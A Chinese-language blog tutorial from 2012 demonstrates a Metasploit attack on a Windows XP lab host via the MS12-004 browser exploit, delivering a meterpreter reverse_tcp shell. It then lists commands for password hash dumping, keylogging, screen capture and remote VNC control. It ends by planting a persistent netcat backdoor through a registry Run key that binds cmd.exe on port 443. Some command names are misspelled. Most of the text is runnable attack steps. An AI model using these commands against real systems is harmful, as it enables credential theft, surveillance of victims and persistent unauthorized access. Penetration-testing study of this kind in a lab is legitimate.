利用Metasploit进行渗透测试

声明:本教程仅限供广大网络安全爱好者交流学习之用,任何人不得用于非法用途,否则后果自负。
最近在玩Backtrack 5 ,就把最近学到的东西分享下,所有工具都是Backtrack 5 自带的,用到的工具 : 大名鼎鼎的Metasploit Feamwork 还有 Netcat

要利用的漏洞:MS12-004 ,虽然漏洞是几个月前出的了,但这里只做渗透演示,重点在讲解工具的使用方法。废话不说,看步骤 :

在控制台执行msfconsole启动Metasploit ,

输入命令search ms12_004我们来找找ms12-004漏洞的利用模块

已经找到了,接下来使用该模块

输入命令 use exploits/windows/browser/ms12_004_midi

接下来输入命令 show options ,显示该漏洞的基本信息,以及要设置的参数

设置参数:

输入命令 :

1
2
3
4
set  SRVHOST  192.168.42.139
Set  PAYLOAD  windows/meterpreter/reverse_tcp
Set  LHOST  192.168.42.130
Set  URIOATH  /

最后 再输入show options ,查看是否设置好

已经OK了,开始渗透。
执行命令 :exploit

可以看到服务已经启动了,链接地址http://192.168.42.130:8080/
在用Xp打开恶意链接地址 http://192.168.42.130:8080/

BackTrack 开始渗透,
这边BT5已经有反应了 ,渗透成功~

输入命令 sessions

我们看到有一个会话,会话的 ID 是1 ,开打开这个会话
输入命令 sessions -i 1 这时,我们已经进入了Meterpreter

Meterpreter 是一个很强大的 payload , 具体说明输入 help 可以看到,
meterpreter> hashdump // 可以看到远程主机帐号和加密后的密码

这里再说几个常用的Meterpreter 命令

1
2
3
4
meterpreter> keyscan_start //开启键盘记录
meterpreter> heyscan_dump //  查看键盘记录的内容
meterpreter> keyscan_stop //  关闭键盘记录
meterpreter> shell //看下图大家都懂的

meterpreter > ps // 获取远程主机进程列表,比windows自带的任务管理器清晰多了

meterpreter>screenshot// 截取远程桌面屏幕

meterpreter > run vnc // 开启远程主机vnc 服务
过一会,可以看到桌面,并且可以控制鼠标和键盘

好,下来我们来留后门,方便以后常来 ~
先上传 nc.exe(netcant)到windows的systen32文件夹下
Upload /pentest/windows-binaries/tools/nc.exe c:\windows\system32

已经成功了,下来我们将nc.exe加到注册表,让他开机自启动
先查看注册表

reg enumkey -k HKLM\SOFTWARE\Miorosoft\Windows\CurrentVersion\Run

已经可以看到注册表键值了
下来加入注册表

reg setval -k HKLM\SOFTWARE\Miorosoft\Windows\CurrentVersion\Run -v backdoor -d c:\windows\system32\nc.exe"-L -d -p 443 cmd.exe"

提示成功,看看XP的注册表

已经有了这个键值
我们重启远程主机试下

输命令 reboot

由于远程主机已经关闭,显示链接断开 ,等xp重启后,我们试试留的后门
Telnet 192.168.42.139 443


已经连接成功了 : ) .。刚接触BT5,各位见笑了 … 论坛有玩B5或者 Metasploit 的朋友可以联系我,求交流。

QQ :791628659

本文地址http://0x7c00.cn/2012/Penetration-testing-with-Metasploit/
2012年4月10日11:34:16